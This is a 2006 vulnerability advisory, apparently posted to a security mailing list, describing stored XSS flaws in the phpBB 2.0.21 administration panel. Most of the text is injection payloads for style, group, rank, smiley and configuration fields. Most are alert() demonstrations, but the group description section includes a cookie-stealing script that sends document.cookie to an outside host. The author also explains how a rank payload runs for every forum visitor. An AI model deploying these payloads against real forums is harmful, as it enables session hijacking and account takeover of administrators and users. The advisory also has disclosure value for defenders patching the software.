Date: Sat Jul 15 15:59:24 2006
From: renatrix at gmail.com (Renatrix Renatrix)
Subject: phpBB Multiple HTML Injection Vulnerabilities

phpBB 2.0.21 XSS in administration
**********************************

//-- By Blwood [renatrix@...il.com]
//-- [ http://www.blwood.net ]
//--

Style Admin
-----------

Management & Create a theme

Lots of input are not properly sanitized like style_name, head_stylesheet,
body_background, tr_color1_name (all the input in simple name)...

We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1>
but it's more interresting to inject javascript :) :
"><body onload="alert('Owned by Blwood')"> => style_name
"><script>alert('Owned by Blwood')</script> => head_stylesheet,
body_background, ...
When an admin will go in Style Administration he will be Owned. (inject in
style_name)
When an admin will edit a them he will be Owned.

Group Administration
--------------------

Management

Input group_description is not correctly sanitized we can inject js like
this : "><script>alert('Owned by Blwood')</script> or
When an admin will go in Group administration he'll be owned. But what's
more, the groups can be seen in groupcp.php
by every visitors.
An exploit could be :
</textarea>"><script>
document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>
or
</textarea>"><script>document.location='http://site.com/ownedpage.html'
</script>

Ranks
-----

Rank Administration

Rank Title (input title) is not correctly sanitized, we can inject js like :
"><script>alert('xss')</script>
But what's interresting, if you give this rank to an user, the rank will
appear in user's topics and the code will be executed when someone sees a
topic :)
Now you can inject what you want but maximum 40 caracters...

Smilies
-------

Smiles Editing Utility

Smiley Code : "><body onload="alert('Owned by Blwood')">

Configuration

General Configuartion

Inputs are not correctly sanitized : Ex : allow_html_tags  =>
"><script>alert('Owned by Blwood')</script>

[ Video ]

http://www.blwood.net/advisory/phpbb2021xssadmin.rar